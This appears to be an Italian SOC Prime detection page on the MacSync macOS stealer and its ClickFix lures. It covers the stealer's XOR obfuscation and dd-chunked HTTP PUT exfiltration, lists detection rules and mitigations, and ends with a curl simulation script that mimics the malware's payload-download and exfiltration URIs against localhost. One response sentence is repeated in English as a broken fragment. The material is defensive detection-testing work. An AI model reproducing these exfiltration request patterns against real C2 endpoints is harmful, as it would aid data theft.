SOC Prime Bias: High

09 Sep 2026 10:01 UTC

MacSync macOS Stealer usa inganni ClickFix per evitare il rilevamento.

Author Photo
SOC Prime Team linkedin icon Segui
MacSync macOS Stealer usa inganni ClickFix per evitare il rilevamento.
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Riepilogo

MacSync Stealer è un malware-as-a-service (MaaS) focalizzato su macOS che si basa sull’ingegneria sociale in stile ClickFix per ingannare gli utenti a eseguire comandi Terminal dannosi. Il malware segue una catena di esecuzione modulare e multi-fase che coinvolge binari Mach-O, esecuzione AppleScript in memoria e esfiltrazione di dati con suddivisione a blocchi. Per evitare il rilevamento, utilizza cifratura XOR, demonizzazione dei processi e rapida rimozione di artefatti forensi.

Indagine

L’indagine ha incluso l’ingegneria inversa di uno stager Mach-O a 64-bit per mappare il suo flusso di esecuzione e le tecniche di evasione. I ricercatori hanno identificato una classe template C++ che usa la cifratura XOR a singolo byte con la chiave 0xAA per nascondere le stringhe funzionali e gli endpoint C2. L’analisi ha anche rivelato un meccanismo avanzato di esfiltrazione che utilizza l’utilità dd per dividere i dati rubati in blocchi da 10 MB prima dei trasferimenti HTTP PUT.

Mitigazione

Gli utenti dovrebbero essere addestrati a evitare di copiare e incollare comandi Terminal suggeriti da errori del browser, pagine di verifica false o pop-up ClickFix. Le organizzazioni dovrebbero monitorare attentamente l’attività del Terminal e l’esecuzione non autorizzata di osascript. Limitare i binari non autorizzati e monitorare la creazione o l’esecuzione di file sospetti all’interno di /tmp può ridurre ulteriormente l’esposizione.

Risposta

Se viene rilevata un’attività di MacSync, l’endpoint macOS interessato dovrebbe essere isolato immediatamente per fermare ulteriori esfiltrazioni di dati. I rispondenti dovrebbero eseguire un’analisi forense della directory /tmp e ispezionare ~/Library/LaunchAgents/ per plist di persistenza malevoli. I log di sistema dovrebbero anche essere esaminati per esecuzioni non autorizzate e il traffico di rete controllato per connessioni a domini C2 noti. osascript execution and network traffic checked for connections to known C2 domains.

Flusso di attacco

Stiamo ancora aggiornando questa parte.

Rilevamenti

Tentativo Sospetto di Esecuzione di Curl [MacOS] (tramite cmdline)

Team SOC Prime
08 Set 2026

L’Archivio è Stato Creato Nella Cartella Temporanea di MacOS (tramite file_event)

Team SOC Prime
08 Set 2026

IOC (HashSha256) da rilevare: MacSync: Il ladro macOS Evasivo che Sfrutta gli Escamotage ClickFix

Regole AI SOC Prime
08 Set 2026

IOC (HashSha1) da rilevare: MacSync: Il ladro macOS Evasivo che Sfrutta gli Escamotage ClickFix

Regole AI SOC Prime
08 Set 2026

IOC (HashMd5) da rilevare: MacSync: Il ladro macOS Evasivo che Sfrutta gli Escamotage ClickFix

Regole AI SOC Prime
08 Set 2026

MacSync Stealer – Rilevazione Basata su URI [Webserver]

Regole AI SOC Prime
08 Set 2026

MacSync: Demonizzazione di Sessioni Invisibili su macOS [Creazione di Processi su Linux]

Regole AI SOC Prime
08 Set 2026

Esecuzione della Simulazione

Prerequisito: Il Controllo Pronto alla Partenza di Telemetria e Baseline deve essere superato.

Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente le TTP identificate e mirare a generare la telemetria esatta prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a diagnosi errate.

  • Narrazione & Comandi d’Attacco: L’attaccante mira a imitare il ciclo di comunicazione del ladro MacSync. Innanzitutto, l’attaccante simula un’esca “Clickfix” dove la macchina della vittima è istruita a scaricare un payload tramite uno specifico URI: /dynamic?txd=. Una volta che il “malware” è in esecuzione, esegue l’esfiltrazione inviando blocchi di dati rubati al server C2 utilizzando una richiesta PUT all’URI /gate?buildtxd=. Questo simula il modello esatto che la regola di rilevamento sta cercando.

  • Script di Test di Regressione: Questo script utilizza curl per generare le richieste HTTP specifiche che corrispondono ai criteri di selezione dell’URI della regola Sigma.

    #!/bin/bash
    # Script di Simulazione URI del Ladro MacSync
    # Questo script simula le richieste GET e PUT utilizzate da MacSync
    
    TARGET_URL="http://localhost"
    
    echo "[+] Simulazione Download Payload (GET /dynamic?txd=)..."
    curl -X GET "$TARGET_URL/dynamic?txd=malicious_payload_123" -s -o /dev/null
    
    echo "[+] Simulazione Esfiltrazione Dati (PUT /gate?buildtxd=)..."
    # Simulazione di un upload suddiviso in blocchi da 10MB come menzionato nella descrizione della regola
    dd if=/dev/urandom of=chunk.bin bs=1M count=10 2>/dev/null
    curl -X PUT "$TARGET_URL/gate?buildtxd=exfil_data_456" 
         --data-binary @chunk.bin 
         -s -o /dev/null
    
    echo "[+] Simulazione Completa."
  • Comandi di Pulizia:

    # Rimuovi il blocco di dati fittizio creato durante la simulazione
    rm -f chunk.bin